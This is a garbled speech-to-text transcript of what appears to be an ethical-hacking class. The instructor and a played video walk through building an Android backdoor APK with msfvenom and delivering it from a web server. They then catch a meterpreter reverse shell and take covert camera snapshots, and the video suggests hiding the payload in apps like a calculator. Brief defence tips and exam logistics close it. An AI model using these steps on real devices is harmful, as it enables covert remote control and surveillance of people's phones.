download. Once I download, I need to go to this Red Snow tool extra section, and I have to in there I have to specify where is right. In there again you have the option of backup your unlocking key, right? So you can copy, you can have a backup of your key and specify the IPSW file, and then just come here and say jailbreak. So it will go you with three options like press this button, press your unlock, and follow the steps, and it is done. Okay, see here it is specified step by step. Okay, in a simple way. But in the new version, might be it is different. These are also good tools. Snowbreeze is also good. While I like Snowbreeze because in the same tool you can see it is also specifying like from where I need to download the package. So I don't need to go to online and search for the IPSW. It will be just here only. Okay. Now discussing of this Windows or BlackBerry is not at all worth. The reason is now it is not in the market. This is CH version 8 slide. So at that time it was there, but now only Android and iOS is available in the market. So let's not waste the time. Okay. Okay. So there are some tools. See in just say for an example, if I go to Android, there are like keys software or some sort of software which where I can download and connect with the mobile phone in order to transfer the data. Similarly, in iPhone, we have iTools, right, to transfer the data, right? So now this software, mobile device management, is a kind of software where your Windows, iPhone, whatever mobile is there, you can connect and transfer the data and work with it. Okay, MDM solution, you can see, which supports all the devices. But these devices are very costly. You can see Mask S360. If you search on Google, it will be not easy to get. Okay, it is costly. Okay. Any questions still here, guys?
Okay.
Okay. So furthermore, how you can hack into Android phones. So we have earlier gone through Metasploit, right, guys? Yes or no?
Yes, sir.
Sir.
Yes, sir.
Yes, sir.
So I hope if I just show you how to create malware, or you can say backdoor for Metasploit, later you can do the other stuff. Yes or no?
Yes, sir.
Yes, sir.
Okay, sounds good. So I'll show you how to create a backdoor, means vulnerable file, malicious file for Apple application. So you can say MSF. Venom. Sorry. Minus P. So earlier, if you remember, if you were creating it for Windows, we were specifying Windows, right? x64, or if it is 32-bit, I say meter reverse underscore TCP. How many of you remember this? lhost equals to
Yes, sir.
192.168.20.50 my Kali IP.
Yes.
L port something randomly,
Four.
right? And then I export this thing outside, right? Like this, let's say uh, fbhacker.exe. Correct? This was we are using earlier. Yes or no?
Yes, sir.
Yes, sir.
If you are
Yes, sir.
creating it for Android, what you have to do is just replace Windows with Android. Okay? And as it is not a common format, right? You can specify R here as a raw format, or you can say minus F file format as raw. Easy? If you want to specify the architecture, you can say minus A as Android. Okay, and definitely exe is not supported in a mobile phone, right? So it'll say APK. Okay, so you can see it is created. So the architecture is Dalvik virtual machine, remember? So ls, and we created a APK file. Now you have to install, transfer this in your mobile phone, right? And parallelly start multi-handler similar to what we did earlier, right? If you install this APK in your mobile phone, you will get the reversion. Easy, guys?
Yes, sir.
Yes,
Yes,
sir.
sir.
Now the thing is, I don't have mobile phone, or else I have shown you this practically, right? So what you can do is you can make use of emulator, right? So Android emulator, okay? You can make use of Android Studio, okay, to practice. Now, Android Studio is free. What you need to do is it is based on Java. So you need to first download it. It requires minimum of 8 GB RAM for just Android, okay, plus your physical machine 4 GB, so 12. Plus it is going to start Android mobile phone, so it requires 4. So if you have less than 16 GB RAM, don't do it. Keep a note, less than 16 GB, don't do it. Okay, so that is better. Cool. Now you just have to install this, and you will get the reverse shell. If you wanna see practically, I can show you in YouTube. Have a look. I'll say AP Android and MS Venom. Okay, so see here, it is just showing with the same methodology. Okay, I'm just sharing my screen along with the voice.
So it's easier for you to see. So we'll be using a tool called MSF Venom, and MSF Venom allows us to create standalone payload and be able to encode them, set the parameters, the different kind of payload they'll be using, the aperture space, and so on. So it's a really great tool for us to create malicious APK files. So we are going to go ahead and use MSF Venom, and then we're going to set the payload -e as Android MetaPreader / reverse _ TCP. For the L host, which is the IP address of the existing server. So we can create a new window, and in the new window we're going to probe and find out what is the IP address. So I can enter ifconfig, and we can see the IP address of 172.16.42.2246. So here we can set the L host, and I'm going to paste it, and from there we can set the L port, and we're going to set it as 4444. And once we do that, we can actually output the file, and I'm going to call this file the attack.apk. So we will create this file, and we are going to shift it into a web application server where we will furnish out all of this payload. So we're going to move the attack.apk into var www.html. And once we've done that, we can cd into the directory, and we can see all the files over there. So what we're going to do is we can enter service Apache 2 followed by start. So this will start the web application server. They'll be hosting the files there. So it's a really powerful way for us to actually get into the environment. So we're going to go into Firefox, and the first thing we're going to do is we're going to hit for the website that we'll be hosting. So we got the IP address as 172.16.42.246 followed by /attack, followed by /attack.apk. So once you do that, we can actually download the file. So once it's downloaded, we can open up the file. So of course, does not allow unknown application from source. So we will allow that in this instance, and then we can click install. So of course, I already have this application installed, and I'm installing it a second time just to demonstrate how easy it is. Again, you can embed the malicious payload into a calculator APK, into WhatsApp APK, and so on. So I already have the application installed. So this is really powerful. So what we can see here is we have a main activity, which is an application that's been created through the installation of the APK file that we have sent over to the target mobile device. So this mobile device here, we're using Visor that allow us to get a screen capture of the device. And this is a fully patched Android device system that I use on a day-to-day basis. It has all the security mechanisms that you can think of. So what we're going to do next is we're going to start a listener. So we can enter MSF console, and once we boot up Metasploit, we can actually host the server or the listener and then be able to get a reverse shell and take control of the system. So very quickly, what we are going to do is we are going to use exploit multi-handler. So once we have that, we got to set what kind of shell are we expecting. So here what we can see is we can set the payload. So we're going to set payload Android /MetaPreader /reverse _ TCP. And then we're going to set the L host as the IP address that we had put forward earlier from the Colonix machine. So once we do that, we can set the L port as 4444, and then we can show options. So once you hit show options, you can see all of the information that you've put forward, and then we can go ahead and enter exploit. So once you enter exploit, we are able to have the listener running, and when the user clicked on it, a lot of times you can embed it into a useful application like a torchlight, like a calculator. So once they double click on it, immediately you'll be able to gain access into the shell. So here I have already meter preader running, so I can enter who am I, or I can enter get UID, or I can enter help, and then I can enter what kind of information we want to see. So here we are in the meter preader, so we can actually enter items like UUID, and then we can see all this information that we have on the machine. And from here, we can also look at some of the other information like sysinfo. So once we hit sysinfo, so what we realized earlier is we can get into the system and we can enter sysinfo. So previously we got a different meter preader shell because I double click on main activity. So from here we can see the actual meter preader, and then we can enter PWD to see which directory we're working on. And there's a lot of other capabilities. You can enter help, and here we can enter check root to see if whether this device has been rooted. If it's not been rooted, we're going to create permissions and control and force the Android device to become rooted. So from here we can also enter the webcam list, and we can see a bunch of web cameras like a back camera, front camera. So when you enter webcam snap followed by -I1, this will actually snap on the back camera. So when you do that, you realize that the operation will fail. That's because I have Visor running at the back. So what I'm going to do is I'm going to close Visor. So once it's closed, I'm going to exit the meter preader shell. And once I do that, I actually have the shell closed right now, and I can exploit it again. And because now you do not have a visibility of the screencast on my machine right now I'm physically touching on the main activity, and this would actually open up this session. And what I'm going to do is I'm going to use and issue the same command, -I1. And what we can see is that I have the camera facing the machine, and once I hit that, it will actually take a snapshot or a screen capture using the activation of the hardware device, and is saving all of those information here. So very quickly, you can see a little blur photo of the front camera that we are facing directly on the Colonix setup that we have. So there you've seen it, how quickly we could actually gain access to the system and be able to see all of the files within the storage, and then be able
So guys, did you saw what happens? It was nothing new, right? The same methodology, just need to install there and you are getting the shell. Correct? Hello, hello.
Yes, sir.
So that's from the Android side. Now, if you want to secure your mobile phone for such things, what you can do is you can install antivirus in your mobile phone, or the best one which I recommend is never install such APK files downloading from the internet. Okay, directly use the Play Store links in order to, or you can say download any software with Play Store only, not from any other marketplace. This is the best thing you can ever have. Okay. Any more questions? So please confirm that you are able to log into the test page. So here we have the exam panel right here. You can see hackersbase.org. Right, like this. Log in with your account. Whatever the username password it is, the same username password which you have got earlier, the same thing, right? And I'm going to create an exam for you now. B1
Yes, sir.
F-B1 final exam. So today is 12. I'm going the time till 8 in the evening.
सर स्क्रीन आप लो सर
Not required actually. Okay, so you will be having guys 50 questions. in 2 hours. Okay, AFB1. And you need to get 35 marks in order to pass the exam. So guys, please confirm that you can see the test in your portal.
Yes, sir.
Everybody can see? Don't tell me like we forgot the password, okay? Like
Yes, sir.
it's a big hectic for me. I have posted the test password in the chat. Okay. Please confirm everybody can log into your portal and start the exam. It is a 2 hours exam, right? And now we are going to start you can the exam till is you can appear the exam and complete the exam till 8 in the evening. Okay, so that's a sufficient time I have specified. Okay, just a sec, I have can see only 25 personnel connected and appearing the exam. I don't know where is the remaining 6-7 personnel. Guys, keep a note. If you miss the exam, there will be no retake. Okay. So don't bother. Don't tell me later like, "Sir, I missed the exam. XYZ things." It's your problem.